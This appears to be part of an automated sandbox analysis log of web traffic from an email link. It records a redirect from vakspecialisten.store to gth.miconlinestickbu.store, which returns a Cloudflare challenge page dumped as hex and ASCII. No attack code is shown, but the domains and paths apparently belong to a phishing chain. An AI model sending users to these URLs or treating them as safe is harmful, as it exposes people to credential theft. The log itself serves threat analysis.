                                    2024-05-22 15:08:57 UTC697INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:08:57 UTC1369INData Raw: 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75
                                    Data Ascii: lor:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:u
                                    2024-05-22 15:08:57 UTC1369INData Raw: 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b
                                    Data Ascii: n-height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.449766172.67.146.1674433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:57 UTC715OUTGET /noki/x-cp-Ruytfvb6hnx.php HTTP/1.1
                                    Host: vakspecialisten.store
                                    Connection: keep-alive
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Referer: https://url12.mailanyone.net/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:57 UTC631INHTTP/1.1 302 Found
                                    Date: Wed, 22 May 2024 15:08:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://gth.miconlinestickbu.store
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xk%2FY27LHDTuYPlwvclt6iY7JNcbV%2BYhwnZLCqdDx276q1BGwPmuas799nUFjQQYiUZ1MPhaNrrggferuDbDuVwRXZdAbbnybSdVhVntyp6N6TjWRxdpKga5zStnZZv5A%2BJv6ZOOgEo0%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887db97ba85e425c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:08:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.44977235.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:58 UTC571OUTOPTIONS /report/v4?s=qVRIKX92qaRfJ6gaBUntmAPdh1Gwu3PvCRc3bNwsPhnTsilQ5DZU4Um%2B7FhcPbmw5rS%2FuybWvO1YxIIbCiiaJDTmsIr9eqHJy%2FRBl67sy9FO5QyJv%2Bk9%2FbuWnA4%2BsCQk4oY9veVPX4QDP0cfbw%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://gth.miconlinestickbu.store
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:58 UTC336INHTTP/1.1 200 OK
                                    content-length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: POST, OPTIONS
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-type, content-length
                                    date: Wed, 22 May 2024 15:08:58 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.449773104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:58 UTC967OUTGET / HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    Referer: https://url12.mailanyone.net/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:58 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:08:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16511
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:08:58 UTC759INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 7a 6b 43 4d 6c 4a 63 73 32 77 58 78 54 73 36 61 68 62 58 35 67 4e 5a 32 58 54 4c 34 76 6b 4c 66 51 61 2b 33 63 7a 2b 77 4a 46 6a 47 66 35 74 4a 74 30 52 4c 77 2b 77 30 51 46 61 4c 6e 57 4b 7a 54 6e 4c 45 43 6b 42 33 6a 47 2b 51 4d 30 6d 30 4a 47 4b 72 4f 75 31 78 48 45 4b 30 65 51 30 63 59 4a 70 6f 57 69 52 5a 74 6d 45 2b 76 30 2b 2b 67 38 55 68 33 33 6c 42 54 7a 61 6c 69 66 36 65 79 2f 6a 75 50 55 37 6f 72 65 51 7a 6e 38 74 37 62 41 4a 6d 4c 51 3d 3d 24 31 78 53 52 63 6b 63 75 42 4f 46 50 46 58 64 30 54 30 5a 47 4e 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: zkCMlJcs2wXxTs6ahbX5gNZ2XTL4vkLfQa+3cz+wJFjGf5tJt0RLw+w0QFaLnWKzTnLECkB3jG+QM0m0JGKrOu1xHEK0eQ0cYJpoWiRZtmE+v0++g8Uh33lBTzalif6ey/juPU7oreQzn8t7bAJmLQ==$1xSRckcuBOFPFXd0T0ZGNg==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:08:58 UTC699INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:08:58 UTC1369INData Raw: 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                                    Data Ascii: r:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url
                                    2024-05-22 15:08:58 UTC1369INData Raw: 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f
                                    Data Ascii: height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{bo
                                    2024-05-22 15:08:58 UTC1369INData Raw: 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a
                                    Data Ascii: TYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:
                                    2024-05-22 15:08:58 UTC1369INData Raw: 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74
                                    Data Ascii: 1NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:t
                                    2024-05-22 15:08:58 UTC1369INData Raw: 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79
                                    Data Ascii: uMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy
                                    2024-05-22 15:08:58 UTC1369INData Raw: 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79
                                    Data Ascii: er-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display
                                    2024-05-22 15:08:58 UTC1369INData Raw: 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c
                                    Data Ascii: screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl
                                    2024-05-22 15:08:58 UTC1369INData Raw: 46 72 6e 44 6f 5f 56 42 6f 4f 32 5f 66 33 6a 53 6e 6e 70 6c 46 79 70 79 44 57 49 38 6d 75 56 58 39 43 50 52 4b 36 63 38 6c 54 6c 67 6b 72 45 47 39 4d 39 4f 75 6d 50 4c 37 69 62 65 71 45 35 58 75 76 31 4a 6a 54 46 6c 55 47 59 4e 41 50 56 59 62 6b 55 77 54 72 55 46 5f 72 70 48 42 65 53 70 67 5a 4a 50 75 4f 6b 4e 4d 45 30 6b 6a 77 78 32 33 57 66 53 59 70 36 36 57 38 44 47 57 75 59 56 51 74 73 56 61 6b 53 70 6a 41 32 61 30 6a 46 6e 6b 4d 66 6a 33 43 53 4a 56 62 42 33 2e 77 44 32 6d 35 42 44 78 5a 35 75 6a 4a 57 62 78 51 76 76 73 53 5a 75 39 56 48 67 57 6f 50 5f 62 39 77 51 4f 62 31 79 61 55 42 33 4d 65 64 2e 56 4b 6b 6b 39 66 77 5f 78 54 34 36 61 41 6d 67 41 47 63 45 42 37 6b 55 43 79 33 66 57 57 31 57 66 2e 73 57 62 77 50 67 6a 65 4a 38 35 5a 45 69 31 6c 4d
                                    Data Ascii: FrnDo_VBoO2_f3jSnnplFypyDWI8muVX9CPRK6c8lTlgkrEG9M9OumPL7ibeqE5Xuv1JjTFlUGYNAPVYbkUwTrUF_rpHBeSpgZJPuOkNME0kjwx23WfSYp66W8DGWuYVQtsVakSpjA2a0jFnkMfj3CSJVbB3.wD2m5BDxZ5ujJWbxQvvsSZu9VHgWoP_b9wQOb1yaUB3Med.VKkk9fw_xT46aAmgAGcEB7kUCy3fWW1Wf.sWbwPgjeJ85ZEi1lM


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.44977435.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:59 UTC502OUTPOST /report/v4?s=qVRIKX92qaRfJ6gaBUntmAPdh1Gwu3PvCRc3bNwsPhnTsilQ5DZU4Um%2B7FhcPbmw5rS%2FuybWvO1YxIIbCiiaJDTmsIr9eqHJy%2FRBl67sy9FO5QyJv%2Bk9%2FbuWnA4%2BsCQk4oY9veVPX4QDP0cfbw%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 424
                                    Content-Type: application/reports+json
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:59 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 31 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 72 6c 31 32 2e 6d 61 69 6c 61 6e 79 6f 6e 65 2e 6e 65 74 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 31 2e 34 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72
                                    Data Ascii: [{"age":0,"body":{"elapsed_time":719,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://url12.mailanyone.net/","sampling_fraction":1.0,"server_ip":"104.21.21.44","status_code":403,"type":"http.error"},"type":"network-error","ur
                                    2024-05-22 15:08:59 UTC168INHTTP/1.1 200 OK
